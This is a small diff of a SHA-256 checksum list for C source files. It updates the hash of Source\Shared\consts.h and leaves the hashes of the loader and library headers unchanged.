-70302e7507ec5beb4959b70a4d91ac4a40b09f2be3e4025ffe166cf824e77857 *Source\Shared\consts.h
+fc2b0b243e1d7bf63e3f81fbd94d8bc578b7ad0b9fe69843a8e0168b2f57a9a4 *Source\Shared\consts.h
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4 *Source\Shared\libinc.h